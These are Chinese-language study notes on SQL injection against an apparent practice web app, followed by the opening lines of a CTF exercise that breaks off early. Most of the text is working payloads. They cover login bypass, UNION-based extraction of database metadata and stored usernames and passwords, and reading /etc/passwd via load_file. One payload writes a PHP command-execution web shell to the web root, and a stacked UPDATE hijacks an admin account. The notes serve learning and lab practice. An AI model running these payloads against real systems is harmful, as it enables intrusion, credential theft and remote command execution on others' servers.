SQL注入
SQL注入
一、基本语法
用户登陆判断语句:
SELECT * FROM users WHERE user='uname' AND password='pass'
SELECT * FROM users WHERE user='name' AND password='' OR ''=''
基于报错的检测方法(low)——>能注入就不会报错
' " % ( )
基于布尔的检测
1' and '1'='1
1' and '1
1' and '1'='2
1' and '0
#类似:select first_name,surname from users where id=' '(单引号中是:1' and '1'='1 将两个单引号再次闭合。意思是,id=1是真后面也是真,这是构造逻辑与运算;逻辑或运算?)
检测表列数/显示信息位于哪一列
' order by 9--+
#按查询序列号排序(注释符:--)select *时表字段数=查询字段数
联合查询:
' union select 1,2--+
' union all select database(),2--+
#单引号用于闭合
联合查询内容列举:
' union select database(),substring_index(USER(),"@",1)--
DB用户:user()
DB版本:version()
(' union select user(),version()-- )
全局函数:@@datadir、@@hostname、@@VERSION、@@version_compile_os
(' union select user(),@@datadir-- 等等)
当前库:database()
(' union select user(),database()-- )
ASCII转字符:char()
(' union select user(),char(55)--+ 把数值输入里面,ASCII码注入)
连接字符串(联合查询):CONCAT_WS(CHAR(32,58,32),user(),database(),version())
(' union select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),null--+)
计算哈希:md5()
(' union select CONCAT_WS(CHAR(32,58,32),user(),database(),version()),md5('a')--+)
Mysql数据结构简介:
information_schema——>源数据库,数据库结构的管理者。(每个结构存储数据)
(包含数据库管理系统内的所有信息,不是数据,是本身信息;包含字段、表、有多少表等等)
搜友库所有表/统计每库中表的数量:
' union select table_name,table_schema from information_schema.tables--+
' UNION select table_schema,count(*) FROM information_Schema.tables group by table_schema --
数据库中的表名
' union select table_name,table_schema from information_schema.tables where table_schema='数据库'--+
Users表中的所有列(user_id、first_name、last_name、user、password、avatar)
' union select table_name,column_name from information_schema.columns where table_schema='数据库' and table_name='users'--+
查询user、password列的内容
' union select user,password from 数据库.users--+
' union select user,password from users--+
' union select null, concat(user,0x3a,password) from users--+
读取文件
' union SELECT null, load_file('/etc/passwd')--+
#命令读取本地数据库文件
写入文件
' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/ www/a.php" --+
#直接写写不进去
保存下载数据库
' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/ tmp/a.db'-
猜列名
' and column is null--+
猜当前表表名
' and table.user is null--+
猜库里其它表
' and (select count(*) from table)>0--+
列表对应关系
' and users.user is null--+
猜字段内容
' or user='admin (输入完全正确的字段猜解)
' or user like ' %a% (大概的字段,只要有a的都查)
猜账号对应密码
' or user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99
#密码需要进行加密处理
#(猜解类似于暴力破解密码,猜解区别就是需要有webapplication输入字符有返回错误提示信息,可用fuzz功能)
当数据库可写(因无法破解所知账号的md5密码,但是数据库中的表可以写入,那么写入一个账号+md5密码)
'; update users set user='jerome' where user='admin
二、练习题
1、BUU SQL COURSE 1
看到有登录
试一下万能的用户名密码,发现不行。